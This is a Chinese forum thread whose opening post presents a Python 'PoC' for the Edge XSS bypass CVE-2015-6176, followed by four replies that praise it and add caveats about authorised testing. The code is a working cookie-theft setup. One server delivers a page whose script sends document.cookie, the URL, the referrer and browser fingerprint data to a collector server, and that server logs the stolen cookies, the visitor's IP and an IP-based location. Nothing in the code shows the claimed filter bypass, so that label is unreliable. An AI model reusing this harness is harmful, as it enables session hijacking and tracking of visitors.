Win10系统Edge浏览器XSS
版本:Windows 10 Version 1511CVE编号:CVE-2015-6176
Edge 错误处理 HTTP 响应中的 HTML 属性,这使得远程攻击者能够通过未指定的向量绕过跨站点脚本 (XSS) 保护机制
import http.server
import socketserver
import socket
import threading
from urllib import parse
import requests
import datetime
PORT = 8080
COLLECTOR_PORT = 9000
# HTML page with extended XSS exploit that sends lots of info via Image GET
to collector
HTML_CONTENT = b\\\"\\\"\\\"<!DOCTYPE html>
<html lang=\\\"en\\\">
<head>
<meta charset=\\\"UTF-8\\\" />
<title>XSS Edge Bypass PoC</title>
<script>
window.onload = function() {
try {
var attackerServer = \\\"http://{LOCAL_IP}:{COLLECTOR_PORT}/collect\\\";
var cookies = document.cookie || \\\"\\\";
var url = window.location.href;
var referrer = document.referrer;
var language = navigator.language || \\\"\\\";
var platform = navigator.platform || \\\"\\\";
var timezone = Intl.DateTimeFormat().resolvedOptions().timeZone ||
\\\"\\\";
var screenRes = screen.width + \\\"x\\\" + screen.height;
var data = {
cookie: cookies,
url: url,
referrer: referrer,
language: language,
platform: platform,
timezone: timezone,
screen: screenRes
};
var query = Object.keys(data).map(function(k) {
return encodeURIComponent(k) + \\\"=\\\" +
encodeURIComponent(data);
}).join(\\\"&\\\");
var img = new Image();
img.src = attackerServer + \\\"?\\\" + query;
} catch(e) {
console.error(\\\"Error sending data:\\\", e);
}
};
</script>
</head>
<body>
<h1 style=\\\"color:red;\\\">XSS Edge Bypass PoC</h1>
<p>If this alert appears, XSS is executed.</p>
</body>
</html>
\\\"\\\"\\\"
# Collector page with large sea picture and centered message (Unicode
allowed)
COLLECTOR_PAGE = \\\"\\\"\\\"<!DOCTYPE html>
<html lang=\\\"en\\\">
<head>
<meta charset=\\\"UTF-8\\\" />
<title>Collected</title>
<style>
body {
margin: 0;
background: url(\\\'
https://images.unsplash.com/photo-1506744038136-46273834b3fb?auto=format&fit=crop&w=1350&q=80\\\')
no-repeat center center fixed;
background-size: cover;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
color: white;
font-family: Arial, sans-serif;
font-size: 2em;
text-shadow: 2px 2px 5px rgba(0,0,0,0.7);
}
</style>
</head>
<body>
<div>Thank you for visiting the collector page </div>
</body>
</html>
\\\"\\\"\\\"
class ExploitHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path in (\\\'/\\\', \\\'/index.html\\\'):
content = HTML_CONTENT.replace(b\\\"{LOCAL_IP}\\\",
local_ip.encode()).replace(b\\\"{COLLECTOR_PORT}\\\",
str(COLLECTOR_PORT).encode())
self.send_response(200)
self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\")
self.send_header(\\\"Content-Length\\\", str(len(content)))
self.end_headers()
self.wfile.write(content)
else:
self.send_error(404)
class CollectorHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
parsed_path = parse.urlparse(self.path)
if parsed_path.path == \\\"/collect\\\":
query = parse.parse_qs(parsed_path.query)
cookie = query.get(\\\"cookie\\\", [\\\"\\\"])
url = query.get(\\\"url\\\", [\\\"\\\"])
referrer = query.get(\\\"referrer\\\", [\\\"\\\"])
language = query.get(\\\"language\\\", [\\\"\\\"])
platform = query.get(\\\"platform\\\", [\\\"\\\"])
timezone = query.get(\\\"timezone\\\", [\\\"\\\"])
screen = query.get(\\\"screen\\\", [\\\"\\\"])
ip = self.client_address
user_agent = self.headers.get(\\\"User-Agent\\\", \\\"Unknown\\\")
timestamp = datetime.datetime.now().strftime(\\\"%Y-%m-%d
%H:%M:%S\\\")
location = self.get_location(ip)
if cookie:
print(f\\\"[{timestamp}] [+] Collected cookie: {cookie}\\\")
print(f\\\" URL: {url}\\\")
print(f\\\" Referrer: {referrer}\\\")
print(f\\\" Language: {language}\\\")
print(f\\\" Platform: {platform}\\\")
print(f\\\" Timezone: {timezone}\\\")
print(f\\\" Screen Resolution: {screen}\\\")
print(f\\\" From IP: {ip}\\\")
print(f\\\" User-Agent: {user_agent}\\\")
print(f\\\" Location: {location}\\\")
print(\\\"-\\\" * 50)
# Save collected info to a file
with open(\\\"collected_data.log\\\", \\\"a\\\", encoding=\\\"utf-8\\\") as f:
f.write(f\\\"[{timestamp}] Cookie: {cookie}\\\\n\\\")
f.write(f\\\" URL: {url}\\\\n\\\")
f.write(f\\\" Referrer: {referrer}\\\\n\\\")
f.write(f\\\" Language: {language}\\\\n\\\")
f.write(f\\\" Platform: {platform}\\\\n\\\")
f.write(f\\\" Timezone: {timezone}\\\\n\\\")
f.write(f\\\" Screen Resolution: {screen}\\\\n\\\")
f.write(f\\\" IP: {ip}\\\\n\\\")
f.write(f\\\" User-Agent: {user_agent}\\\\n\\\")
f.write(f\\\" Location: {location}\\\\n\\\")
f.write(\\\"-\\\" * 50 + \\\"\\\\n\\\")
self.send_response(200)
self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\")
content = COLLECTOR_PAGE.encode(\\\'utf-8\\\')
self.send_header(\\\"Content-Length\\\", str(len(content)))
self.end_headers()
self.wfile.write(content)
else:
self.send_error(404)
def get_location(self, ip):
# Use free IP info service; fallback gracefully if no internet
try:
resp = requests.get(f\\\"https://ipinfo.io/{ip}/json\\\", timeout=3)
if resp.status_code == 200:
data = resp.json()
city = data.get(\\\"city\\\", \\\"\\\")
region = data.get(\\\"region\\\", \\\"\\\")
country = data.get(\\\"country\\\", \\\"\\\")
loc = data.get(\\\"loc\\\", \\\"\\\")
return f\\\"{city}, {region}, {country} (coords: {loc})\\\"
except Exception:
pass
return \\\"Location lookup failed or unavailable\\\"
def get_local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((\\\"8.8.8.8\\\", 80))
ip = s.getsockname()
except Exception:
ip = \\\"127.0.0.1\\\"
finally:
s.close()
return ip
def run_exploit_server():
with socketserver.TCPServer((\\\"\\\", PORT), ExploitHandler) as httpd:
print(f\\\"[*] Exploit server running at: http://
{local_ip}:{PORT}/index.html\\\")
httpd.serve_forever()
def run_collector_server():
with socketserver.TCPServer((\\\"\\\", COLLECTOR_PORT), CollectorHandler) as
httpd:
print(f\\\"[*] Collector server listening for stolen cookies at:
http://{local_ip}:{COLLECTOR_PORT}/collect\\\")
httpd.serve_forever()
if __name__ == \\\"__main__\\\":
local_ip = get_local_ip()
try:
print(f\\\"[*] Your server IP is: {local_ip}\\\")
exploit_thread = threading.Thread(target=run_exploit_server,
daemon=True)
exploit_thread.start()
run_collector_server()
except KeyboardInterrupt:
print(\\\"\\\\n[!] Shutting down servers. Goodbye!\\\")
Re: Win10系统Edge浏览器XSS
感谢分享这个CVE-2015-6176的详细PoC。Edge早期版本对HTML属性的错误处理确实给XSS过滤器留下了绕过的空间,这个利用链通过构造自动加载的Image请求来收集cookie、referrer等敏感信息,手法很经典。对于仍在Win10 1511或更早版本上的用户,建议尽快升级到受支持的版本,同时留意浏览器安全更新。另外,在实际测试时记得替换代码中的IP地址,并且只在受控环境中验证,避免误伤。Re: Win10系统Edge浏览器XSS
感谢分享这个Edge浏览器的XSS绕过漏洞,PoC代码也写得很详细。CVE-2015-6176影响Windows 10早期版本,看来当时Edge在处理HTML属性时确实存在缺陷。这个通过Image GET外传cookie等信息的思路很经典,适合给有安全测试需求的朋友参考。不过建议在实际环境中测试前务必获得授权。Re: Win10系统Edge浏览器XSS
感谢分享这个Win10早期版本Edge的XSS绕过漏洞(CVE-2015-6176)。PoC代码很完整,利用Image GET方式外泄用户敏感信息(cookie、referrer、平台信息等)的思路很清晰。不过需要提醒一下,这个漏洞距今已久,当前主流Edge版本应该已修复,仅适合在测试环境或历史版本中验证。另外运行这类代码时请注意只在可控环境中测试,避免泄露非授权信息。Re: Win10系统Edge浏览器XSS
看到这个CVE-2015-6176,应该是挺老的一个Edge XSS绕过漏洞了,影响Windows 10 1511版本。你贴的PoC代码思路是利用Image请求外带数据,绕过XSS过滤器。对于当时还在用老版Edge的用户,这个漏洞确实有风险,能把cookie、referrer这些敏感信息传出去。 不过现在Edge早就换Chromium内核了,微软也多次更新修复了这类问题。如果你还在用旧版Win10且没打补丁,建议尽快升级系统或更新浏览器,避免被利用。另外,PoC仅供学习验证,别在未授权站点上测试。感谢分享,给研究旧版浏览器安全的同学们当个案例还是不错的。
页:
[1]